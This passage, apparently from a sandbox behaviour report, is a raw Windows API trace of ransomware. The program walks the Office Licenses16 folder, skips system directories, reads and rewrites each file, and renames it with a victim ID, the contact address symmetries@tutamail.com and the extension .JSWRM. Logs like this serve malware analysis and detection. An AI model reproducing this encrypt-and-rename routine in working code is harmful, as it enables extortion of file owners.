CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0102.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0102.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0102.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0102.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.892] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0102.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0102.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0102.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.893] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3ef7f7a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3ef7f7a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3fdcd93, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d75, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="HO30DA~1.XRM")) returned 1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.893] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0102.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0102.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0102.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0102.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0102.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0102.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0102.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0102.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0102.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0102.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0102.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.894] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11637) returned 1 [0102.894] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0102.895] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0102.898] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.899] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0102.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.899] CloseHandle (hObject=0x45c) returned 1 [0102.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0102.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0102.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0102.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0102.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0102.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0102.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.899] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0102.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0102.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0102.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.901] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3dc6c97, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3dc6c97, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3eaba33, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4e0e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="HODC3A~1.XRM")) returned 1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0102.901] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0102.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0102.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0102.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d298, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0102.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0102.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0102.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0102.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0102.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0102.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0102.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0102.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0102.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.902] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19982) returned 1 [0102.902] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e00) returned 0x24c1d0 [0102.902] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4e00, lpOverlapped=0x0) returned 1 [0102.905] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.905] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4e00, lpOverlapped=0x0) returned 1 [0102.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.905] CloseHandle (hObject=0x45c) returned 1 [0102.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0102.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0102.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0102.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0102.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0102.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0102.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.905] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0102.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0102.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0102.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.906] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3c6f733, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3c6f733, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3d2e398, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5611, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Grace-ppd.xrm-ms", cAlternateFileName="HOA2C7~1.XRM")) returned 1 [0102.906] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0102.906] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0102.906] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0102.907] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0102.907] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.907] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.907] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.907] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.907] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.907] lstrcmpiW (lpString1="HomeBusinessR_Grace-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0102.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241178, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0102.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0102.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0102.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f70, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0102.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0102.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0102.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0102.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0102.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.908] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22033) returned 1 [0102.908] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5610) returned 0x24c1d0 [0102.908] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5610, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5610, lpOverlapped=0x0) returned 1 [0102.912] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 